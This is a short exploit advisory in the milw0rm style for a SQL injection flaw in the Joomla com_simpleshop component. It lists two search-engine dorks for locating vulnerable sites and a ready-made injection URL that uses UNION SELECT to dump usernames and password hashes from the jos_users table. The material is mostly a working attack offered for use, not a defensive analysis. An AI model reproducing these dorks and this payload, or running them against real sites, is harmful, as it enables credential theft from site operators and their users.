############################################################### # # joomla com_simpleshop SQL Injection(section) # ############################################################### # # AUTHOR : S@BUN # # HOME : http://www.milw0rm.com/author/1334 # # MAİL : hackturkiye.hackturkiye@gmail.com # ################################################################ # # DORK 1 : allinurl:"com_simpleshop" # # DORK 2 : allinurl: "com_simpleshop"section # ################################################################ EXPLOIT : index.php?option=com_simpleshop&Itemid=S@BUN&cmd=section§ion=-000/**/union+select/**/000,111,222,concat(username,0x3a,password),0,concat(username,0x3a,password)/**/from/**/jos_users/* ################################################################ # S@BUN i AM NOT HACKER S@BUN ################################################################ simple shop galore.co.za July 2007 (C) 2000 - 2007 galore.co.za http://www.gnu.org/copyleft/gpl.html GNU/GPL info@galore.co.za www.galore.co.za 2.0